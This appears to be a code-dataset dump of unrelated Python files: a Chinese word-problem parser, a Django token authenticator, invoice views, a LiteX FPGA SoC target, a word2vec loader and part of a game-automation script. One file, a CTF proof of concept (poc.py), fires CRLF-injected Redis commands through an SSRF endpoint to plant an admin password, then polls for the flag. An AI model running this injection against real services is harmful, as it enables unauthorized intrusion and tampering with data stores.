    entityLIST = list(set(list(questionDICT["Definition"].keys())+list(questionDICT["Calculation"])+list(questionDICT["Memory"])))
    subjectLIST = []
    for k in ["Memory", "Definition", "Calculation"]:
        for ent in entityLIST:
            if ent in questionDICT[k]:
                subjectLIST.extend(list(questionDICT[k][ent].keys()))
    subjectLIST = list(set(subjectLIST))
    # The parser may have mislabeled subjects as entities (or vice versa);
    # swap the roles when the "entities" look like known subjects/pronouns.
    if entity2 != "":
        if entity1 in subjectLIST or entity2 in subjectLIST or entity2 in ["他", "她"]:
            tmpEnt1 = subject1
            tmpEnt2 = subject2
            subject1 = entity1
            subject2 = entity2
            entity1 = tmpEnt1
            entity2 = tmpEnt2
    if subject2 != "":
        if subject1 in entityLIST or subject2 in entityLIST:
            tmpSubj1 = entity1
            tmpSubj2 = entity2
            entity1 = subject1
            entity2 = subject2
            subject1 = tmpSubj1
            subject2 = tmpSubj2
    # Put the already-known entity1/subject1 into the entity2/subject2 slot
    # (the reference side), negating the delta to keep the relation correct.
    if entity1 in entityLIST and entity2 != "":
        tmpEnt = entity1
        entity1 = entity2
        entity2 = tmpEnt
        amount = -amount
    if subject1 in subjectLIST and subject2 != "":
        tmpSubj = subject1
        subject1 = subject2
        subject2 = tmpSubj
        amount = -amount
    # When entity1/subject1 are blank, try to fill them from known records.
    if entity1 == "":
        if unit in questionDICT["Entity"]:
            if len(questionDICT["Entity"][unit]) == 1:
                entity1 = questionDICT["Entity"][unit][0]
    if subject1 == "":
        for k in ["Definition", "Memory", "Calculation"]:
            if entity1 != "" and entity2 != "":
                tmpEnt = entity2
            else:
                tmpEnt = entity1
            if tmpEnt in questionDICT[k]:
                subject1 = list(questionDICT[k][tmpEnt].keys())[0]
                subject2 = subject1
                break
    # Decide whether the reference object is an entity or a subject.
    if entity1 != "" and entity2 != "":
        entity = entity2
        subject = subject1
        refOBJ = entity2
    else:
        entity = entity1
        subject = subject2
        refOBJ = subject2
    if subject in ["", "他", "她"]:
        for k in ["Definition", "Memory", "Calculation"]:
            if entity in questionDICT[k]:
                subjectLIST = list(questionDICT[k][entity].keys())
                if len(subjectLIST) == 1 and subjectLIST[0] != "":
                    subject = subjectLIST[0]
                    refOBJ = subject
                    break
    # Look up the reference side's current amount.
    refAmount = 0
    for k in ["Memory", "Definition", "Calculation"]:
        if entity in questionDICT[k]:
            if subject in questionDICT[k][entity]:
                if k == "Calculation":
                    refAmount = questionDICT[k][entity][subject][-1][unit]
                else:
                    refAmount = questionDICT[k][entity][subject][unit]
                break
    # Store the relation in Calculation.
    if entity1 in questionDICT["Calculation"]:
        if subject1 in questionDICT["Calculation"][entity1]:
            questionDICT["Calculation"][entity1][subject1].append({unit: amount, "ref": refOBJ})
        else:
            questionDICT["Calculation"][entity1][subject1] = [{unit: amount, "ref": refOBJ}]
    else:
        questionDICT["Calculation"][entity1] = {subject1: [{unit: amount, "ref": refOBJ}]}
    # Cache the resolved amount in Memory.
    if entity1 in questionDICT["Memory"]:
        questionDICT["Memory"][entity1][subject1] = {unit: refAmount + amount}
    else:
        questionDICT["Memory"][entity1] = {subject1: {unit: refAmount + amount}}
    if unit in questionDICT["Entity"]:
        if entity1 not in questionDICT["Entity"][unit]:
            questionDICT["Entity"][unit].append(entity1)
    else:
        # BUGFIX: add the unit key instead of replacing the whole "Entity"
        # dict — the old `questionDICT["Entity"] = {unit: [entity1]}` dropped
        # every other unit already recorded.  existential()/transitive() use
        # this same add-a-key pattern.
        questionDICT["Entity"][unit] = [entity1]
    if refOBJ == subject:
        return subject1, refOBJ, questionDICT
    else:
        return entity1, refOBJ, questionDICT
def transitive(subject, entity, amount, unit, questionDICT):
    """Record a transitive-verb action (an action with an object), e.g.
    "X bought N ...".

    Resolves an empty entity via the unit registry and a pronoun/empty
    subject via the Definition/Calculation stores, then appends the amount
    to questionDICT["Calculation"][entity][subject].

    Returns (subject, entity, questionDICT).
    """
    vague = ["", "他", "她", "我", "他們", "她們", "我們"]
    if entity == "":
        # Adopt the only entity registered for this unit, if unambiguous.
        if unit in questionDICT["Entity"]:
            registered = questionDICT["Entity"][unit]
            if len(registered) == 1:
                entity = registered[0]
        if subject in vague:
            if questionDICT["Definition"]:
                if subject not in questionDICT["Definition"][entity]:
                    subject = list(questionDICT["Definition"][entity])[0]
            elif questionDICT["Calculation"]:
                if subject not in questionDICT["Calculation"][entity]:
                    subject = list(questionDICT["Calculation"][entity])[0]
    elif subject in vague:
        # Entity given but subject is a pronoun: take the first known subject.
        if entity in questionDICT["Definition"]:
            subject = list(questionDICT["Definition"][entity])[0]
        elif entity in questionDICT["Calculation"]:
            subject = list(questionDICT["Calculation"][entity])[0]
    calc = questionDICT["Calculation"]
    if entity in calc:
        calc[entity].setdefault(subject, []).append({unit: amount})
    else:
        # First record for this entity: also register the unit->entity link.
        holders = questionDICT["Entity"].setdefault(unit, [])
        if entity not in holders:
            holders.append(entity)
        calc[entity] = {subject: [{unit: amount}]}
    return subject, entity, questionDICT
def intransitive(entity, questionDICT):
    """Handle intransitive verbs (actions with no object), e.g. "some flew
    away".

    When *entity* is unknown, scans Definition and Calculation for the
    largest non-money amount (units equal to "元" are excluded), treats it
    as the starting pool, and records pool - (everything else) as the
    remaining amount under questionDICT["Calculation"][entity].

    Returns (primaryEnt, amount_removed, primaryUnit, questionDICT).
    """
    if entity not in questionDICT["Definition"] and entity not in questionDICT["Calculation"]:
        primaryEnt = None
        primaryAmount = None
        primaryUnit = None
        primarySubject = None
        entAmount = 0
        resultAmount = 0
        # Pass 1: scan Definition for the largest amount of the primary unit;
        # entAmount accumulates every matching record along the way.
        for ent in questionDICT["Definition"]:
            for subj in questionDICT["Definition"][ent]:
                for unit in questionDICT["Definition"][ent][subj]:
                    if unit != "元":
                        if primaryEnt == None:
                            primarySubject = subj
                            primaryEnt = ent
                            primaryAmount = questionDICT["Definition"][ent][subj][unit]
                            primaryUnit = unit
                            entAmount += questionDICT["Definition"][ent][subj][unit]
                        elif unit == primaryUnit:
                            if primaryAmount < questionDICT["Definition"][ent][subj][unit]:
                                primarySubject = subj
                                primaryEnt = ent
                                primaryAmount = questionDICT["Definition"][ent][subj][unit]
                                primaryUnit = unit
                            entAmount += questionDICT["Definition"][ent][subj][unit]
        # Pass 2: same scan over the Calculation entries (lists of records).
        for ent in questionDICT["Calculation"]:
            for subj in questionDICT["Calculation"][ent]:
                for v in questionDICT["Calculation"][ent][subj]:
                    for unit in v:
                        if unit != "元":
                            if primaryEnt == None:
                                primarySubject = subj
                                primaryEnt = ent
                                primaryAmount = v[unit]
                                primaryUnit = unit
                                entAmount += v[unit]
                            elif unit == primaryUnit:
                                if primaryAmount < v[unit]:
                                    primarySubject = subj
                                    primaryEnt = ent
                                    primaryAmount = v[unit]
                                    primaryUnit = unit
                                entAmount += v[unit]
        # Remaining = largest pool minus everything that is not the pool.
        resultAmount = primaryAmount - (entAmount - primaryAmount)
        questionDICT["Calculation"][entity] = {primarySubject: [{primaryUnit: resultAmount}]}
    # NOTE(review): indentation reconstructed from a flattened dump — if
    # *entity* is already known the locals above are never bound and this
    # return raises NameError; confirm placement against the upstream file.
    return primaryEnt, (entAmount - primaryAmount), primaryUnit, questionDICT
| 43.345238 | 148 | 0.529113 |
954fa496fb0b4df23c4401a9fe2a772558cb0fae | 1,680 | py | Python | gae/apps/auth_ndb/rest_authentication.py | paulormart/gae-project-skeleton-100 | cf9f174d4209b213292fd267b241590102a74a68 | [
"MIT"
] | null | null | null | gae/apps/auth_ndb/rest_authentication.py | paulormart/gae-project-skeleton-100 | cf9f174d4209b213292fd267b241590102a74a68 | [
"MIT"
] | null | null | null | gae/apps/auth_ndb/rest_authentication.py | paulormart/gae-project-skeleton-100 | cf9f174d4209b213292fd267b241590102a74a68 | [
"MIT"
] | null | null | null |
from rest_framework.authentication import BaseAuthentication
from rest_framework.authentication import get_authorization_header
from rest_framework import exceptions
from .models import User as UserModel
class TokenAuthentication(BaseAuthentication):
    """
    Simple token based authentication.
    Clients should authenticate by passing the token key in the "Authorization"
    HTTP header, prepended with the string "Token ". For example:
        Authorization: Token 401f7ac837da42b97f613d789819ff93537bee6a
    """

    # Model used to resolve tokens.  A custom model may be substituted but
    # must expose get_by_token() and users with an is_active flag.
    model = UserModel

    def authenticate(self, request):
        """Return (user, token) for a valid header, None when the scheme is
        not ours, and raise AuthenticationFailed for malformed headers."""
        parts = get_authorization_header(request).split()
        if not parts or parts[0].lower() != b'token':
            # Not the "Token" scheme — let other authenticators try.
            return None
        if len(parts) == 1:
            raise exceptions.AuthenticationFailed(
                'Invalid token header. No credentials provided.')
        if len(parts) > 2:
            raise exceptions.AuthenticationFailed(
                'Invalid token header. Token string should not contain spaces.')
        return self.authenticate_credentials(parts[1])

    def authenticate_credentials(self, token):
        """Look up *token* and validate that its owner is active."""
        user = self.model.get_by_token(token=token)
        if not user:
            raise exceptions.AuthenticationFailed('Invalid token')
        if not user.is_active:
            raise exceptions.AuthenticationFailed('User inactive or deleted')
        return (user, token)

    def authenticate_header(self, request):
        # Scheme advertised in the WWW-Authenticate header on 401 responses.
        return 'Token'
| 31.698113 | 81 | 0.688095 |
7ce7aea5cd58ae1758788d52fd00c0540b898cea | 927 | py | Python | web200-4/poc.py | mehrdad-shokri/CTF_web | 206529603af3824fc8117166ff978af3495f5a58 | [
"MIT"
] | 664 | 2016-08-23T01:03:00.000Z | 2022-03-20T17:02:45.000Z | web200-4/poc.py | CTFshow/CTF_web | 206529603af3824fc8117166ff978af3495f5a58 | [
"MIT"
] | 12 | 2016-09-09T07:25:12.000Z | 2021-10-05T21:11:48.000Z | web200-4/poc.py | CTFshow/CTF_web | 206529603af3824fc8117166ff978af3495f5a58 | [
"MIT"
] | 203 | 2016-10-17T02:15:33.000Z | 2021-10-17T06:36:37.000Z | import requests
import threading
def test():
    # Python 2 CTF exploit helper.  Endlessly POSTs an SSRF payload: the
    # CRLF-encoded URL smuggles Redis commands (CONFIG SET dir/dbfilename,
    # SET admin xx00, SAVE) through the vulnerable "/web7/input" fetcher to
    # the local Redis on port 6379, planting the admin password.
    while True:
        try:
            url = "http://web7.08067.me/web7/input"
            data = {'value': 'http://127.0.0.1%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20admin%20xx00%0d%0aSAVE%0d%0a:6379/foo'}
            requests.post(url, data=data)
        except Exception, e:
            # Best-effort: network errors are expected while racing.
            pass
def test2():
    # Polls the admin page with the password planted by test() and prints
    # the response body once it contains the flag.
    while True:
        try:
            url = "http://web7.08067.me/web7/admin"
            data = {'passworld': 'xx00'}
            text = requests.post(url, data=data).text
            if 'flag' in text:
                print text
        except:
            # Keep polling through transient failures.
            pass
# Race the two stages with 10 daemon threads each: planters (test) and
# pollers (test2).  join() blocks forever since both loops never return.
# NOTE(review): `list` shadows the builtin — left as-is for fidelity.
list = []
for i in range(10):
    t = threading.Thread(target=test)
    t.setDaemon(True)
    t.start()
    list.append(t)
for i in range(10):
    t = threading.Thread(target=test2)
    t.setDaemon(True)
    t.start()
    list.append(t)
for i in list:
    i.join()
aada2cc349d21ebcc22520568c8ccfa148b3099b | 5,418 | py | Python | workbench/invoices/views.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 15 | 2020-09-02T22:17:34.000Z | 2022-02-01T20:09:10.000Z | workbench/invoices/views.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 18 | 2020-01-08T15:28:26.000Z | 2022-02-28T02:46:41.000Z | workbench/invoices/views.py | yoshson/workbench | 701558cac3357cd82e4dc99f0fefed12ee81ddc5 | [
"MIT"
] | 8 | 2020-09-29T08:00:24.000Z | 2022-01-16T11:58:19.000Z | import datetime as dt
from collections import defaultdict
from django.contrib import messages
from django.shortcuts import redirect, render
from django.utils.translation import gettext, ngettext
from django.views.decorators.http import require_POST
from workbench import generic
from workbench.invoices.models import Invoice
from workbench.logbook.models import LoggedCost, LoggedHours
from workbench.tools.pdf import pdf_response
from workbench.tools.xlsx import WorkbenchXLSXDocument
class InvoicePDFView(generic.DetailView):
    """Render a single invoice as a PDF letter."""

    model = Invoice

    def get(self, request, *args, **kwargs):
        self.object = self.get_object()
        # ?disposition=attachment forces a download instead of inline view.
        as_attachment = request.GET.get("disposition") == "attachment"
        pdf, response = pdf_response(self.object.code, as_attachment=as_attachment)
        pdf.init_letter()
        pdf.process_invoice(self.object)
        pdf.generate()
        return response
class InvoiceXLSXView(generic.DetailView):
    """Export one invoice's services and their logged hours/costs as XLSX."""

    model = Invoice

    def get(self, request, *args, **kwargs):
        self.object = self.get_object()
        # Header row followed by a spacer row.
        data = [
            [
                gettext("service"),
                gettext("description"),
                gettext("rendered on"),
                gettext("effort type"),
                gettext("hourly rate"),
                gettext("hours"),
                gettext("cost"),
            ],
            [],
        ]
        # Group logbook entries by invoice service up front (two queries
        # instead of one per service).  .reverse() restores chronological
        # order relative to the models' default ordering.
        hours = defaultdict(list)
        cost = defaultdict(list)
        for entry in LoggedHours.objects.filter(
            invoice_service__invoice=self.object
        ).reverse():
            hours[entry.invoice_service_id].append(entry)
        for entry in LoggedCost.objects.filter(
            invoice_service__invoice=self.object
        ).reverse():
            cost[entry.invoice_service_id].append(entry)
        for service in self.object.services.all():
            # One summary row per service...
            data.append(
                [
                    service.title,
                    service.description,
                    "",
                    service.effort_type,
                    service.effort_rate,
                    "",
                    "",
                ]
            )
            # ...then detail rows for its logged hours and costs.
            for entry in hours[service.id]:
                data.append(
                    [
                        "",
                        entry.description,
                        entry.rendered_on,
                        "",
                        "",
                        entry.hours,
                        entry.hours * service.effort_rate
                        if service.effort_rate
                        else "",
                    ]
                )
            for entry in cost[service.id]:
                data.append(
                    ["", entry.description, entry.rendered_on, "", "", "", entry.cost]
                )
            data.append([])
        xlsx = WorkbenchXLSXDocument()
        xlsx.add_sheet(gettext("logbook"))
        xlsx.table(None, data)
        return xlsx.to_response("%s.xlsx" % self.object.code)
class RecurringInvoiceDetailView(generic.DetailView):
    """Detail view that can also materialize due invoices on demand via
    the ?create_invoices query parameter."""

    def get(self, request, *args, **kwargs):
        self.object = self.get_object()
        if not request.GET.get("create_invoices"):
            return self.render_to_response(self.get_context_data())
        created = self.object.create_invoices()
        count = len(created)
        messages.info(
            request,
            ngettext("Created %s invoice.", "Created %s invoices.", count) % count,
        )
        # Jump to the invoice list when something was created; otherwise
        # stay on this object's page.
        return redirect("invoices_invoice_list" if count else self.object)
def reminders(request):
    """Render the payment-reminders overview, one row per organization."""
    invoices = Invoice.objects.overdue().select_related(
        "customer", "owned_by", "project"
    )
    # Group overdue invoices by customer, collecting the set of distinct
    # last_reminded_on dates (may contain None for never-reminded invoices).
    by_organization = {}
    for invoice in invoices:
        if invoice.customer not in by_organization:
            by_organization[invoice.customer] = {
                "organization": invoice.customer,
                "last_reminded_on": {invoice.last_reminded_on},
                "invoices": [invoice],
            }
        else:
            row = by_organization[invoice.customer]
            row["invoices"].append(invoice)
            row["last_reminded_on"].add(invoice.last_reminded_on)

    def last_reminded_on(row):
        # Most recent reminder date, ignoring None; None if never reminded.
        days = row["last_reminded_on"] - {None}
        return max(days) if days else None

    reminders = [
        dict(
            row,
            last_reminded_on=last_reminded_on(row),
            total_excl_tax=sum(invoice.total_excl_tax for invoice in row["invoices"]),
        )
        for row in by_organization.values()
    ]
    return render(
        request,
        "invoices/reminders.html",
        {
            # Never-reminded rows (None -> date.min) sort first, then by name.
            "reminders": sorted(
                reminders,
                key=lambda row: (
                    row["last_reminded_on"] or dt.date.min,
                    row["organization"].name,
                ),
            )
        },
    )
@require_POST
def dunning_letter(request, customer_id):
    """Build a dunning-letter PDF covering every overdue invoice of one
    customer, and stamp those invoices as reminded today."""
    overdue = (
        Invoice.objects.overdue()
        .filter(customer=customer_id)
        .select_related("customer", "contact__organization", "owned_by", "project")
    )
    pdf, response = pdf_response("reminders", as_attachment=True)
    pdf.dunning_letter(invoices=list(overdue))
    pdf.generate()
    # Record that the reminder went out today.
    overdue.update(last_reminded_on=dt.date.today())
    return response
| 30.438202 | 86 | 0.547988 |
9e2907dfb6eae60c8ce313b4e2c952b6005c906d | 7,100 | py | Python | litex_boards/targets/sqrl_xcu1525.py | smunaut/litex-boards | caac75c7dbcba68d9f4fb948107cb5d6ff60e05f | [
"BSD-2-Clause"
] | 2 | 2021-06-30T22:07:37.000Z | 2022-02-02T06:10:32.000Z | litex_boards/targets/sqrl_xcu1525.py | smunaut/litex-boards | caac75c7dbcba68d9f4fb948107cb5d6ff60e05f | [
"BSD-2-Clause"
] | null | null | null | litex_boards/targets/sqrl_xcu1525.py | smunaut/litex-boards | caac75c7dbcba68d9f4fb948107cb5d6ff60e05f | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python3
#
# This file is part of LiteX-Boards.
#
# Copyright (c) 2020 Florent Kermarrec <florent@enjoy-digital.fr>
# SPDX-License-Identifier: BSD-2-Clause
import os
import argparse
from migen import *
from migen.genlib.resetsync import AsyncResetSynchronizer
from litex_boards.platforms import xcu1525
from litex.soc.cores.clock import *
from litex.soc.integration.soc_core import *
from litex.soc.integration.builder import *
from litex.soc.cores.led import LedChaser
from litedram.modules import MT40A512M8
from litedram.phy import usddrphy
from litepcie.phy.usppciephy import USPPCIEPHY
from litepcie.software import generate_litepcie_software
# CRG ----------------------------------------------------------------------------------------------
class _CRG(Module):
    """Clock/Reset Generator: derives sys, sys4x and idelay clock domains
    from the board's 300 MHz DDRAM-channel reference clock via an UltraScale+
    MMCM, with BUFGCE buffering for the divided system clock."""

    def __init__(self, platform, sys_clk_freq, ddram_channel):
        self.rst = Signal()
        self.clock_domains.cd_sys    = ClockDomain()
        self.clock_domains.cd_sys4x  = ClockDomain(reset_less=True)
        self.clock_domains.cd_pll4x  = ClockDomain(reset_less=True)
        self.clock_domains.cd_idelay = ClockDomain()

        # # #

        self.submodules.pll = pll = USPMMCM(speedgrade=-2)
        self.comb += pll.reset.eq(self.rst)
        pll.register_clkin(platform.request("clk300", ddram_channel), 300e6)
        # pll4x runs at 4x sys and feeds both sys (via BUFGCE_DIV /4) and sys4x.
        pll.create_clkout(self.cd_pll4x, sys_clk_freq*4, buf=None, with_reset=False)
        pll.create_clkout(self.cd_idelay, 500e6)
        platform.add_false_path_constraints(self.cd_sys.clk, pll.clkin) # Ignore sys_clk to pll.clkin path created by SoC's rst.
        self.specials += [
            Instance("BUFGCE_DIV", name="main_bufgce_div",
                p_BUFGCE_DIVIDE=4,
                i_CE=1, i_I=self.cd_pll4x.clk, o_O=self.cd_sys.clk),
            Instance("BUFGCE", name="main_bufgce",
                i_CE=1, i_I=self.cd_pll4x.clk, o_O=self.cd_sys4x.clk),
        ]
        # IDELAYCTRL needs the 500 MHz reference for DDR4 I/O delay calibration.
        self.submodules.idelayctrl = USPIDELAYCTRL(cd_ref=self.cd_idelay, cd_sys=self.cd_sys)
# BaseSoC ------------------------------------------------------------------------------------------
class BaseSoC(SoCCore):
    """LiteX SoC for the SQRL XCU1525 board with DDR4 and optional
    PCIe / SATA (via an SFP-to-SATA adapter) support."""

    def __init__(self, sys_clk_freq=int(125e6), ddram_channel=0, with_pcie=False, with_sata=False, **kwargs):
        platform = xcu1525.Platform()

        # SoCCore ----------------------------------------------------------------------------------
        SoCCore.__init__(self, platform, sys_clk_freq,
            ident          = "LiteX SoC on XCU1525",
            ident_version  = True,
            **kwargs)

        # CRG --------------------------------------------------------------------------------------
        self.submodules.crg = _CRG(platform, sys_clk_freq, ddram_channel)

        # DDR4 SDRAM -------------------------------------------------------------------------------
        # Only instantiate the DDR4 PHY when no integrated RAM was requested.
        if not self.integrated_main_ram_size:
            self.submodules.ddrphy = usddrphy.USPDDRPHY(
                pads             = platform.request("ddram", ddram_channel),
                memtype          = "DDR4",
                sys_clk_freq     = sys_clk_freq,
                iodelay_clk_freq = 500e6)
            self.add_sdram("sdram",
                phy           = self.ddrphy,
                module        = MT40A512M8(sys_clk_freq, "1:4"),
                size          = 0x40000000,
                l2_cache_size = kwargs.get("l2_size", 8192)
            )
            # Workaround for Vivado 2018.2 DRC, can be ignored and probably fixed on newer Vivado versions.
            platform.add_platform_command("set_property SEVERITY {{Warning}} [get_drc_checks PDCN-2736]")

        # PCIe -------------------------------------------------------------------------------------
        if with_pcie:
            self.submodules.pcie_phy = USPPCIEPHY(platform, platform.request("pcie_x4"),
                data_width = 128,
                bar0_size  = 0x20000)
            self.add_pcie(phy=self.pcie_phy, ndmas=1)

        # SATA -------------------------------------------------------------------------------------
        if with_sata:
            # Imported lazily so litesata is only required when SATA is enabled.
            from litex.build.generic_platform import Subsignal, Pins
            from litesata.phy import LiteSATAPHY

            # IOs
            _sata_io = [
                # SFP 2 SATA Adapter / https://shop.trenz-electronic.de/en/TE0424-01-SFP-2-SATA-Adapter
                ("qsfp2sata", 0,
                    Subsignal("tx_p", Pins("N9")),
                    Subsignal("tx_n", Pins("N8")),
                    Subsignal("rx_p", Pins("N4")),
                    Subsignal("rx_n", Pins("N3")),
                ),
            ]
            platform.add_extension(_sata_io)

            # RefClk, Generate 150MHz from PLL.
            self.clock_domains.cd_sata_refclk = ClockDomain()
            self.crg.pll.create_clkout(self.cd_sata_refclk, 150e6)
            sata_refclk = ClockSignal("sata_refclk")

            # PHY
            self.submodules.sata_phy = LiteSATAPHY(platform.device,
                refclk     = sata_refclk,
                pads       = platform.request("qsfp2sata"),
                gen        = "gen2",
                clk_freq   = sys_clk_freq,
                data_width = 16)

            # Core
            self.add_sata(phy=self.sata_phy, mode="read+write")

        # Leds -------------------------------------------------------------------------------------
        self.submodules.leds = LedChaser(
            pads         = platform.request_all("user_led"),
            sys_clk_freq = sys_clk_freq)
# Build --------------------------------------------------------------------------------------------
def main():
    """Command-line entry point: parse arguments, build the SoC/bitstream
    and optionally generate the PCIe driver or load the bitstream."""
    parser = argparse.ArgumentParser(description="LiteX SoC on XCU1525")
    parser.add_argument("--build",         action="store_true", help="Build bitstream")
    parser.add_argument("--load",          action="store_true", help="Load bitstream")
    parser.add_argument("--sys-clk-freq",  default=125e6,       help="System clock frequency (default: 125MHz)")
    parser.add_argument("--ddram-channel", default="0",         help="DDRAM channel (default: 0)")
    parser.add_argument("--with-pcie",     action="store_true", help="Enable PCIe support")
    parser.add_argument("--driver",        action="store_true", help="Generate PCIe driver")
    parser.add_argument("--with-sata",     action="store_true", help="Enable SATA support (over SFP2SATA)")
    builder_args(parser)
    soc_core_args(parser)
    args = parser.parse_args()

    soc = BaseSoC(
        sys_clk_freq  = int(float(args.sys_clk_freq)),
        # base-0 int() so the channel may be given as decimal or 0x-prefixed hex.
        ddram_channel = int(args.ddram_channel, 0),
        with_pcie     = args.with_pcie,
        with_sata     = args.with_sata,
        **soc_core_argdict(args)
    )
    builder = Builder(soc, **builder_argdict(args))
    builder.build(run=args.build)

    if args.driver:
        generate_litepcie_software(soc, os.path.join(builder.output_dir, "driver"))

    if args.load:
        prog = soc.platform.create_programmer()
        prog.load_bitstream(os.path.join(builder.gateware_dir, soc.build_name + ".bit"))
if __name__ == "__main__":
main()
| 42.51497 | 128 | 0.547606 |
f4a869e817e6cb41d286746960bb532392db8df1 | 753 | py | Python | utils/Helpers.py | bdhingra/coref-gru | 9360a53cafc4f8d4f53e4fcded273ba62a68e484 | [
"BSD-2-Clause"
] | 14 | 2018-10-05T00:16:05.000Z | 2021-01-15T08:24:40.000Z | utils/Helpers.py | bdhingra/coref-gru | 9360a53cafc4f8d4f53e4fcded273ba62a68e484 | [
"BSD-2-Clause"
] | 2 | 2018-11-29T13:21:31.000Z | 2018-12-07T02:49:03.000Z | utils/Helpers.py | bdhingra/coref-gru | 9360a53cafc4f8d4f53e4fcded273ba62a68e484 | [
"BSD-2-Clause"
] | 6 | 2019-01-11T10:33:04.000Z | 2021-02-26T03:52:38.000Z | import numpy as np
EMBED_DIM=128
def load_word2vec_embeddings(dictionary, vocab_embed_file):
    """Build an embedding matrix for *dictionary* from a word2vec text file.

    dictionary maps word -> row index.  The file's first line is the
    "<vocab_size> <embed_dim>" header; each following line is a word and its
    vector.  Rows for words missing from the file keep a random init.

    Returns (W, embed_dim), or (None, EMBED_DIM) when no file is given.
    NOTE: Python 2 code (print statement, dict.iteritems()).
    """
    if vocab_embed_file is None: return None, EMBED_DIM
    fp = open(vocab_embed_file)
    info = fp.readline().split()
    embed_dim = int(info[1])
    vocab_embed = {}
    for line in fp:
        line = line.split()
        vocab_embed[line[0]] = np.array(map(float, line[1:]), dtype='float32')
    fp.close()
    vocab_size = len(dictionary)
    # Random init for every row; known words are overwritten below.
    W = np.random.randn(vocab_size, embed_dim).astype('float32')
    n = 0
    for w, i in dictionary.iteritems():
        if w in vocab_embed:
            W[i,:] = vocab_embed[w]
            n += 1
    print "%d/%d vocabs are initialized with word2vec embeddings." % (n, vocab_size)
    return W, embed_dim
| 26.892857 | 84 | 0.632138 |
1bb9f76ad07c5a8dae45150e4293d491e3e7038c | 94,050 | py | Python | idler.py | aurimas13/IdleIdler | 5dc8ca50a4cb6d287742f5cd77e8504e4df5fc1c | [
"MIT"
] | null | null | null | idler.py | aurimas13/IdleIdler | 5dc8ca50a4cb6d287742f5cd77e8504e4df5fc1c | [
"MIT"
] | null | null | null | idler.py | aurimas13/IdleIdler | 5dc8ca50a4cb6d287742f5cd77e8504e4df5fc1c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# Copyright (c) 2021 Robert Osborne
#
# python3 idler.py --help
#
import argparse
import textwrap
import time
import sys
import os
import configparser
import datetime
import distutils
import json
import math
import glob
import shutil
import pyautogui
import pygetwindow as gw
from PIL import Image, ImageChops, ImageStat
from pathlib import Path
from PIL import ImageGrab
from functools import partial
ImageGrab.grab = partial(ImageGrab.grab, all_screens=True)
# GLOBALS
# Yeah, yeah, globals are bad, sue me
config = configparser.ConfigParser()
# Window origin of the game window in screen points; 0,0 means "not yet
# calibrated" (set by activate_app/hunt_for_menu at runtime).
top_x = 0
top_y = 0
# Physical pixels per screen point (2 on Retina displays); screenshots are
# taken in pixels while clicks are in points.
screen_scale = 2
infinite_loop = False
# Usually 376, 426, etc. and set restart on 386, 436, ...
CHARGE_TIME = 60.0 * 2.5
CHARGE_INTERVAL = 15.0
HAVI_ULT = '8'
APP_NAME = "Idle Champions"
RUNTIME_MINUTES = 20
GEM_LOOPS = 20000
DEFAULT_ADVENTURE = "madwizard"
DEFAULT_LEVEL_DELAY = 20
NUM_FAMILIARS = 6
# Image-diff thresholds used by safe_image_compare: summed RGB channel mean
# and per-channel mean difference limits.
MAX_TOTAL_IMAGE_MEAN = 35.0
MAX_IMAGE_MEAN = 10.0
# TODO: launch checklist
# [ ] Change run to no-modron, just charge briv at end of timer
# [ ] Create backup git on github with full history
# [ ] Squash history
# [ ] Make public
# TODO: things on my todo list
# [ ] Use flag for restart with Steam image vs. x,y (more stable?)
# [ ] Flag to pause on level 1 and allow Shandie's dash to reset
# [ ] Flag to do briv swapping at each zone complete (heavy duty and occupies entire time)
# [ ] Make champ flags work so don't need team in config file or can modify team in config file (for chores)
# [ ] Add more champs to the familiar leveling code
# [ ] Level Shandie and then wait for dash to trigger
COUNTDOWN = 5
DEFAULT_DELAY = 0.7
DEFAULT_DRAG = 0.1
# Screenshot retry budget for zone/level recognition loops.
LEVEL_TRYS=20
# Handle retinae vs standard displays by swapping prefixes
first_prefix = "./images/sml-"
second_prefix = "./images/"
# speed characters
have_briv = True
have_binwin = True
have_celeste = True
have_donaar = False
have_deekin = True
have_havilar = True
have_minsc = True
have_sentry = True
have_viper = False
have_shandie = True
have_melf = True
have_gold = True
bounty_size = "small"
# Logging switches used by verbose_print/debug_print.
verbose = False
debugging = False
# Size in points of the menu-button template images.
MENU_BUTTON_WIDTH = 30
MENU_BUTTON_HEIGHT = 30
def verbose_print(msg):
    """Emit *msg* only when the module-level ``verbose`` flag is set."""
    global verbose
    if not verbose:
        return
    print(msg)
def debug_print(msg):
    """Emit *msg* only when the module-level ``debugging`` flag is set."""
    global debugging
    if not debugging:
        return
    print(msg)
def with_top_offset(off_x, off_y, as_point=False):
    """Translate a window-relative offset into absolute screen coordinates.

    Returns a pyautogui.Point when *as_point* is True, else an (x, y) tuple.
    """
    abs_x = top_x + off_x
    abs_y = top_y + off_y
    return pyautogui.Point(abs_x, abs_y) if as_point else (abs_x, abs_y)
def menu_location():
    """Absolute screen position of the in-game Menu button (window offset 32,73)."""
    return with_top_offset(32, 73)
def top_location_from_menu(x, y):
    """Recover the window origin from the menu button's centre.

    Inverse of menu_location(): subtract the menu offset (32, 73) plus half
    of the 18-point button image (9, 9).
    """
    return x - 41, y - 82
def print_reverse_without_offset(x, y, as_point=False):
    """Debug helper: convert an absolute screen position back into an
    offset relative to the window origin (top_x, top_y), print it, and
    return it (as a pyautogui.Point when *as_point* is True).
    """
    x = x - top_x
    y = y - top_y
    # BUG FIX: the tuple used to be passed as a second print() argument
    # ("...%d,%d", (x, y)), so the placeholders were never expanded.
    print("Offset from top_x, top_y: %d,%d" % (x, y))
    if as_point:
        return pyautogui.Point(x, y)
    return x, y
def move_to_menu():
    """Move the cursor onto the in-game Menu button."""
    menu_x, menu_y = menu_location()
    pyautogui.moveTo(menu_x, menu_y)
def move_to_offset(x, y, duration=0.0):
    """Move the cursor to a window-relative offset over *duration* seconds."""
    abs_x, abs_y = with_top_offset(x, y)
    pyautogui.moveTo(abs_x, abs_y, duration=duration)
def click_offset(x, y, duration=0.0, delay=None, tag=None):
    """Click at window-relative (x, y).

    tag: when given, log the click through verbose_print.
    delay: when truthy, sleep afterwards to let the UI settle.
    """
    move_to_offset(x, y, duration=duration)
    pyautogui.click()
    if tag:
